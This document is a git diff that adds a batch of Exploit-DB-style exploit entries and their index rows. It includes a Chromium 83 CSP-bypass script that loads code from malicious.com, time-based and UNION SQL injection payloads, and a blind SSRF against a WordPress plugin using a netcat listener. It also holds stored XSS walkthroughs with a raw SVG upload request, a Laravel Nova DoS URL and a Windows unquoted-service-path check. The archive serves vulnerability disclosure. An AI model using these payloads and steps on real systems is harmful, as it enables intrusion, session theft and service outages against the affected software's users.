diff --git a/exploits/hardware/webapps/48807.txt b/exploits/hardware/webapps/48807.txt index 8f204714e..e84022984 100644 --- a/exploits/hardware/webapps/48807.txt +++ b/exploits/hardware/webapps/48807.txt @@ -1,4 +1,4 @@ -# Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26 - Persistent Cross-Site Scripting +# Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26 - Persistent Cross-Site Scripting # Date: 2020-08-31 # Exploit Author: Jonatan Schor and Uriel Yochpaz # Vendor Homepage: https://www.rad.com/products/secflow-1v-IIoT-Gateway diff --git a/exploits/multiple/local/49195.js b/exploits/multiple/local/49195.js new file mode 100644 index 000000000..0d70ec83c --- /dev/null +++ b/exploits/multiple/local/49195.js @@ -0,0 +1,34 @@ +#Title: Chromium 83 - Full CSP Bypass +#Date: 02/09/2020 +#Exploit Author: Gal Weizman +#Vendor Homepage: https://www.chromium.org/ +#Software Link: https://download-chromium.appspot.com/ +#Version: 83 +#Tested On: Mac OS, Windows, iPhone, Android +#CVE: CVE-2020-6519 + +(function(){ + + var payload = ` + top.SUCCESS = true; + var o = document.createElement("object"); + o.data = \`http://malicious.com/bypass-object-src.html\`; + document.body.appendChild(o); + var i = document.createElement("iframe"); + i.src = \`http://malicious.com/bypass-child-src.html\`; + document.body.appendChild(i); + var s = document.createElement("script"); + s.src = \`http://malicious.com/bypass-script-src.js\`; + document.body.appendChild(s); + `; + + document.body.innerHTML+=""; + setTimeout(() => { + if (!top.SUCCESS) { + XXX.contentWindow.eval(payload); + } + }); + +}()) + +// further information: https://github.com/weizman/CVE-2020-6519 \ No newline at end of file diff --git a/exploits/multiple/webapps/49189.txt b/exploits/multiple/webapps/49189.txt new file mode 100644 index 000000000..e7cf09b35 --- /dev/null +++ b/exploits/multiple/webapps/49189.txt @@ -0,0 +1,26 @@ +# Exploit Title: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) +# Date: 03/12/2020 +# Exploit Author: Pankaj Verma (_p4nk4j) +# Vendor Homepage: https://www.canto.com/integrations/wordpress/ +# Software Link: https://github.com/CantoDAM/Canto-Wordpress-Plugin +# Version: 1.3.0 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2020-28976, CVE-2020-28977, CVE-2020-28978 + + +Description:- +The Canto plugin 1.3.0 for WordPress contains Blind SSRF Vulnerabilities. +It allows an unauthenticated attacker to make a request to any Internal and External Server via "subdomain" parameter. + +Vulnerable Parameters and Endpoints:- +https://target/wp-content/plugins/canto/includes/lib/detail.php?subdomain= +https://target/wp-content/plugins/canto/includes/lib/get.php?subdomain= +https://target/wp-content/plugins/canto/includes/lib/tree.php?subdomain= + +Steps To Reproduce:- +1. Start a Netcat Listener on any port For e.g. 4499 +2. Navigate to "/wp-content/plugins/canto/includes/lib/detail.php?subdomain=" +3. Add the Attacker's IP and Port For e.g. "172.17.0.1:4499?" to "subdomain=" parameter. +4. Observe the response we got from the Target on Attacker's Listener. + +Note:- Using "?" in the payload is mandatory as it acts as a bypass to conduct this attack. \ No newline at end of file diff --git a/exploits/multiple/webapps/49192.txt b/exploits/multiple/webapps/49192.txt new file mode 100644 index 000000000..ea2631cdf --- /dev/null +++ b/exploits/multiple/webapps/49192.txt @@ -0,0 +1,36 @@ +# Exploit Title: Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection +# Date: 2020-12-04 +# Exploit Author: KeopssGroup0day,Inc +# Vendor Homepage: https://github.com/geraked/phpscript-sgh +# Software Link: https://github.com/geraked/phpscript-sgh +# Version: 0.1.0 +# Tested on: Kali Linux + +------------------------------------------------------------------------------------------------------------------------ +Source code(localhost/admin/admins.php): + +if ($_REQUEST['op']=='add') { + $id = $username = $password = $conf_password = $firstname = $lastname = +$email = $pic = $_SESSION['aapic'] = ""; + } + else { + $result = $conn->query("SELECT * FROM sgh_admins WHERE +id=".test_input($_REQUEST['id'])." LIMIT 1"); + $row = $result->fetch_assoc(); + extract($row); + $_SESSION['aapic'] = $pic; + } + +------------------------------------------------------------------------------------------------------------------------ +Parameter: id (GET) +Type: time-based blind +Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) +Payload: op=edit&id=1 AND (SELECT 9367 FROM +(SELECT(SLEEP(5)))pBEE)&_pjax=#pjax-container + +Type: UNION query +Title: Generic UNION query (NULL) - 7 columns +Payload: op=edit&id=-5015 UNION ALL SELECT +NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b716271,0x536b4e4a775448674c73477175675a4c58476659474f524b535456706e7276474251424a4f67744b,0x717a626b71),NULL-- +-&_pjax=#pjax-container +------------------------------------------------------------------------------------------------------------------------ \ No newline at end of file diff --git a/exploits/multiple/webapps/49194.txt b/exploits/multiple/webapps/49194.txt new file mode 100644 index 000000000..42aae22fc --- /dev/null +++ b/exploits/multiple/webapps/49194.txt @@ -0,0 +1,33 @@ +# Exploit Title: Testa Online Test Management System 3.4.7 - 'q' SQL Injection +# Date: 2020-07-21 +# Google Dork: N/A +# Exploit Author: Ultra Security Team +# Team Members: Ashkan Moghaddas , AmirMohammad Safari , Behzad Khalifeh , Milad Ranjbar +# Vendor Homepage: https://testa.cc +# Version: v3.4.7 +# Tested on: Windows/Linux +# CVE: N/A + +.:: Description ::. +Testa Helps You To make Online Exams. + +.:: Proof Of Concept (PoC) ::. +Step 1 - Find Your Target Using Testa - Online Test Management System. +Step 2 - Click on List And Search Exams. +Step 3 - Inject Your Payloads in Search Field. + +.:: Sample Request ::. +POST / HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: localhost +Cookie: PHPSESSID=7eg4b3fl6vm8a11kmkh4pkq290; testa_user2=1 +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 8 + +p=1&q=-1' UNION ALL SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 # \ No newline at end of file diff --git a/exploits/php/webapps/49190.txt b/exploits/php/webapps/49190.txt new file mode 100644 index 000000000..a767981e7 --- /dev/null +++ b/exploits/php/webapps/49190.txt @@ -0,0 +1,16 @@ +# Exploit Title: Composr CMS 10.0.34 - 'banners' Persistent Cross Site Scripting +# Date: 3-12-2020 +# Exploit Author: Parshwa Bhavsar +# Vendor Homepage: https://compo.sr/ +# Software Link: https://compo.sr/download.htm +# Version: 10.0.34 +# Tested on: Windows 10/ Kali Linux + +Steps To Reproduce :- + +1. Install the CMS from the download link & configure it. +2. After configuration login with admin Credential . +3. You will notice “Add banner” in the top of the browser. +4. Click on it and Put XSS payload (any) in “Description” field. +5. Save it & Click on Home. +6. Every time any user visit the website , the XSS payload will trigger. \ No newline at end of file diff --git a/exploits/php/webapps/49193.txt b/exploits/php/webapps/49193.txt new file mode 100644 index 000000000..c1fad4aff --- /dev/null +++ b/exploits/php/webapps/49193.txt @@ -0,0 +1,16 @@ +# Exploit Title: MiniCMS 1.10 - 'content box' Stored XSS +# Date: 2019-7-4 +# Exploit Author: yudp +# Vendor Homepage: https://github.com/bg5sbk/MiniCMS +# Software Link:https://github.com/bg5sbk/MiniCMS +# Version: 1.10 +# CVE :CVE-2019-13339 + +Payload: In /MiniCMS/mc-admin/page-edit.php + +POC: + +1. Go to the page-edit page and input the payload into the content box ,click save button +2.Use burpsuite to edit the payload. Pay attention that the “+” needs to be url-encoded +3.After that, go to the page we have saved +4.Window will pop with the domain \ No newline at end of file diff --git a/exploits/php/webapps/49196.txt b/exploits/php/webapps/49196.txt new file mode 100644 index 000000000..4b8497363 --- /dev/null +++ b/exploits/php/webapps/49196.txt @@ -0,0 +1,19 @@ +# Exploit Title: Savsoft Quiz 5 - 'field_title' Stored Cross-Site Scripting +# Date: 2020-09-02 +# Exploit Author: Dhruv Patel(dhruvp111296) +# Vendor Homepage: https://savsoftquiz.com/ +# Software Link: https://github.com/savsofts/savsoftquiz_v5.git +# Version: 5.0 +# Tested on: Windows 10 + +Attack vector: +This vulnerability can results attacker to inject the XSS payload in admin +panel Custom Field section. And Inject JavaScript Malicious code & Steal +User’s cookie + +Vulnerable Parameters: title +Steps for reproduce: +1. Go to admin panel’s add custom fields page +2. Fill the Title name as payload in title. +3. Now Click on Save we can see our payload gets executed. +4. All Users Can Show our Payload As a xss. \ No newline at end of file diff --git a/exploits/php/webapps/49197.txt b/exploits/php/webapps/49197.txt new file mode 100644 index 000000000..ba09305d5 --- /dev/null +++ b/exploits/php/webapps/49197.txt @@ -0,0 +1,16 @@ +# Exploit Title: Forma LMS 2.3 - 'First & Last Name' Stored Cross-Site Scripting +# Date: 04-12-2020 +# Exploit Author: Hemant Patidar (HemantSolo) +# Vendor Homepage: https://www.formalms.org/download.html +# Software Link: https://www.formalms.org/ +# Version: 2.3 +# Tested on: Windows 10/Kali Linux + +Steps-To-Reproduce: +1. Go to the Forma LMS and login to your account. +2. Now go to the User Profile. +3. Now Edit the profile. +4. Put the below payload in first and last name: +"" +5. Now click on Save button. +6. The XSS will be triggered. \ No newline at end of file diff --git a/exploits/php/webapps/49198.txt b/exploits/php/webapps/49198.txt new file mode 100644 index 000000000..c950630a4 --- /dev/null +++ b/exploits/php/webapps/49198.txt @@ -0,0 +1,16 @@ +# Exploit Title: Laravel Nova 3.7.0 - 'range' DoS +# Date: June 22, 2020 +# Exploit Author: iqzer0 +# Vendor Homepage: https://nova.laravel.com/ +# Software Link: https://nova.laravel.com/releases +# Version: Version v3.7.0 +# Tested on: Manjaro / Chrome v83 + +An authenticated user can crash the application by setting a higher +value to the 'range' (default 30) parameter and sending simultaneous +requests (10 simultaneous requests was enough to DoS the server in my +testing) + +Vulnerable URL: +https://example.com/nova-api/metrics/sum-orders?timezone=Indian%2FMaldives&twelveHourTime=true&range=3000000 +Vulnerable Parameter: range \ No newline at end of file diff --git a/exploits/php/webapps/49199.txt b/exploits/php/webapps/49199.txt new file mode 100644 index 000000000..2628cfb65 --- /dev/null +++ b/exploits/php/webapps/49199.txt @@ -0,0 +1,92 @@ +# Exploit Title: CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated) +# Date: 04/12/2020 +# Exploit Author: Eshan Singh +# Vendor Homepage: https://www.cmsmadesimple.org/ +# Software Link: https://www.cmsmadesimple.org/downloads +# Version: cmsms v2.2.15 +# Tested on: Windows/Kali Linux/Ubuntu + +Description +---------------------- +CMS Made Simple 2.2.15 allows an authenticated user with access to the +Content Manager to edit content and put persistent XSS payload using the +malicious SVG file. The user can get cookies from every authenticated user +who visits the website. + +SVG Payload +------------- + + + + + + + + +https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Files/SVG_XSS.svg + + +Steps to reproduce +------------------- +1. Login into the cmsms admin panel using the admin user. +2. then go to content > file manager > images, now upload the malicious svg +( +https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Files/SVG_XSS.svg) +file. +3. now open the svg file location ( +http://127.0.0.1/cmsms/uploads//images/SVG_XSS.svg) and BOOM! you got the +popup. + +Burp Request +------------- + +POST /cmsms/admin/moduleinterface.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) +Gecko/20100101 Firefox/83.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://127.0.0.1/ +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; +boundary=---------------------------379224531139948695983200896304 +Content-Length: 1040 +Origin: http://127.0.0.1 +Connection: close +Cookie: +a3c9a2f9998cdfdc410fef5f094579cb8f2f3306=c36ffe152373337eee92ec4985172db8528361bf%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoicjB4NHIiLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkbElVM2FsR2l6UkR0dG5ROHJPVVwvd3V3M3hXano1M0wzYW9pVUhxT2pWQW4xaHNPNjZDLm9HIn0%3D; +__c=3d8ee0fbb464e874e82; CMSSESSID5d26ee9cb371=b1gen2isn6vf4g1sal7jdt5upv + +-----------------------------379224531139948695983200896304 +Content-Disposition: form-data; name="mact" + +FileManager,m1_,upload,0 +-----------------------------379224531139948695983200896304 +Content-Disposition: form-data; name="__c" + +3d8ee0fbb464e874e82 +-----------------------------379224531139948695983200896304 +Content-Disposition: form-data; name="disable_buffer" + +1 +-----------------------------379224531139948695983200896304 +Content-Disposition: form-data; name="m1_files[]"; filename="SVG_XSS.svg" +Content-Type: image/svg+xml + + + + + + + + +-----------------------------379224531139948695983200896304-- \ No newline at end of file diff --git a/exploits/php/webapps/49202.txt b/exploits/php/webapps/49202.txt new file mode 100644 index 000000000..30422f611 --- /dev/null +++ b/exploits/php/webapps/49202.txt @@ -0,0 +1,33 @@ +# Exploit Title: Zabbix 5.0.0 - Stored XSS via URL Widget Iframe +# Date: 8/11/2020 +# Exploit Author: Shwetabh Vishnoi +# Vendor Homepage: https://www.zabbix.com/ +# Software Link: https://www.zabbix.com/download +# Affected Version: Zabbix before 3.0.32rc1, 4.x before 4.0.22rc1, 4.1.x through 4.4.x before 4.4.10rc1, and 5.x before 5.0.2rc1 +# CVE : CVE-2020-15803 + +Affected URL/endpoint(s): +http://192.168.1.7/zabbix.php?sid=f7ca8c8270ce38c7&action=dashboard.widget.check + +Affected Param: + +Description: The application contains a widget functionality within Global +View Dashboard which can be used by a malicious admin to propagate stored +cross site scripting attack. The “URL” widget iframe does not have any +inbuilt restrictions for the content executing within. + +Impact: The malicious webpages within iframes can be used for hosting forms +for Phishing, malware propagation, forced redirections etc. + +The affected Global View dashboard is displayed to all the users of the +application, so all the users will be affected with this vulnerability. + +Reproduction Steps: +1. Login to the application with Admin +2. In Global View Dashboard, Add a widget +3. Select Type – “URL”, fill any random values for Name, Refresh Interval. +4. Now, in the URL parameter, enter a malicious URL. +5. For demo purpose, I have hosted a web server on my machine and hosted a webpage http://localhost/hello.html. (Alternatively, you can use “ http://14.rs” to display popups.) +6. The malicious webpage containing payload will be executed on the dashboard via iFrame. +7. The executed content can redirect the user to a malicious page (We have used Bing page for redirection). \ No newline at end of file diff --git a/exploits/windows/local/49191.txt b/exploits/windows/local/49191.txt new file mode 100644 index 000000000..c1624a300 --- /dev/null +++ b/exploits/windows/local/49191.txt @@ -0,0 +1,38 @@ +# Exploit Title: IDT PC Audio 1.0.6499.0 - 'STacSV' Unquoted Service Path +# Discovery by: Diego Cañada +# Software link: https://www.pconlife.com/download/otherfile/20566/90674cffc8658c4f2bf58d43bb9b7ccb/ +# Discovery Date: 2020-12-03 +# Tested Version: 1.0.6499.0 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Home Single Language x64 ES + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, displayname, pathname, startmode | findstr /i +"Auto" |findstr /i /v "C:\Windows\\" | findstr /i /v """ + +Audio service STacSV c:\Program Files\IDT\WDM\STacSV64.exe Auto + +# Service info: + +C:\>sc qc StacSV +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: StacSV + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\STacSV64.exe + GRUPO_ORDEN_CARGA : AudioGroup + ETIQUETA : 0 + NOMBRE_MOSTRAR : Audio Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + +#Exploit: + +A successful attempt would require the local user to be able to insert +their code in the system root path undetected by the OS or other security +applications where it could potentially be executed during application +startup or reboot. If successful, the local user's code would execute with +the elevated privileges of the application. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 3e318052e..d8fd509ac 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11219,6 +11219,8 @@ id,file,description,date,author,type,platform,port 49147,exploits/windows/local/49147.txt,"aSc TimeTables 2021.6.2 - Denial of Service (PoC)",2020-12-02,"Ismael Nava",local,windows, 49157,exploits/windows/local/49157.txt,"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path",2020-12-02,"Manuel Alvarez",local,windows, 49179,exploits/windows/local/49179.cpp,"Microsoft Windows - Win32k Elevation of Privilege",2020-12-02,nu11secur1ty,local,windows, +49191,exploits/windows/local/49191.txt,"IDT PC Audio 1.0.6499.0 - 'STacSV' Unquoted Service Path",2020-12-04,"Diego Cañada",local,windows, +49195,exploits/multiple/local/49195.js,"Chromium 83 - Full CSP Bypass",2020-12-04,"Gal Weizman",local,multiple, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -43406,3 +43408,13 @@ id,file,description,date,author,type,platform,port 49186,exploits/hardware/webapps/49186.txt,"Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion",2020-12-03,LiquidWorm,webapps,hardware, 49187,exploits/hardware/webapps/49187.txt,"Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure",2020-12-03,LiquidWorm,webapps,hardware, 49188,exploits/multiple/webapps/49188.txt,"Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting",2020-12-03,"Hemant Patidar",webapps,multiple, +49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple, +49190,exploits/php/webapps/49190.txt,"Composr CMS 10.0.34 - 'banners' Persistent Cross Site Scripting",2020-12-04,"Parshwa Bhavsar",webapps,php, +49192,exploits/multiple/webapps/49192.txt,"Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection",2020-12-04,KeopssGroup0day_Inc,webapps,multiple, +49193,exploits/php/webapps/49193.txt,"MiniCMS 1.10 - 'content box' Stored XSS",2020-12-04,yudp,webapps,php, +49194,exploits/multiple/webapps/49194.txt,"Testa Online Test Management System 3.4.7 - 'q' SQL Injection",2020-12-04,"Ultra Security Team",webapps,multiple, +49196,exploits/php/webapps/49196.txt,"Savsoft Quiz 5 - 'field_title' Stored Cross-Site Scripting",2020-12-04,"Dhruv Patel",webapps,php, +49197,exploits/php/webapps/49197.txt,"Forma LMS 2.3 - 'First & Last Name' Stored Cross-Site Scripting",2020-12-04,"Hemant Patidar",webapps,php, +49198,exploits/php/webapps/49198.txt,"Laravel Nova 3.7.0 - 'range' DoS",2020-12-04,iqzer0,webapps,php, +49199,exploits/php/webapps/49199.txt,"CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)",2020-12-04,"Eshan Singh",webapps,php, +49202,exploits/php/webapps/49202.txt,"Zabbix 5.0.0 - Stored XSS via URL Widget Iframe",2020-12-04,"Shwetabh Vishnoi",webapps,php,